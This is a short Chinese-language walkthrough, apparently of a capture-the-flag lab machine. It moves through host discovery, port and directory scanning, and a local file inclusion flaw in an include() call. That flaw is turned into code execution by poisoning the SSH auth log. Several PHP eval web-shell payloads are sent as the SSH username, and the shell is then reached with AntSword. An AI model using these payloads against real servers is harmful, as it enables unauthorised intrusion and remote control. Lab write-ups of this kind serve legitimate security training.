主机IP查找
用arp-scan可以快速发现局域网内的IP列表。
192.168.3.137
对靶机进行端口扫描
发现其开着21和80还有8888端口
访问首页(发现没有什么功能点)
dirsearch扫描以下其目录
就扫出来一个index.html(发现没有什么,还有一个8888端口没有访问)
访问8888端口,发现一个登录框,尝试进行弱口令,暴力破解》》》》》无果
再用dirb进行扫描发现有一个http://192.168.3.137/antibot_image/的目录
直接访问以下
发现一个info.php进去瞅瞅找找线索。
查看网站的根目录!
查看网站的源码,发现了存在文件包含函数include() image传参,可以整一手!
用文件包含进行敏感数据读取
之前的端口扫描时没有扫描全,再次进行扫描发现开着2211》》》ssh端口 可以利用包含SSH日志进行利用!
ssh'<?php phpinfo();eval($_POST['cmd']);?>'@192.168.3.137 -p 2211
ssh '<?php @eval($_POST[pass]);?'@192.168.3.137 -p 2211
ssh <?php @eval($_POST[1]);?>@192.168.3.137 -p 2211
在网站上访问ssh日志文件查看报错信息
/var/log/auth.log
用蚁剑进行连接(连接成功)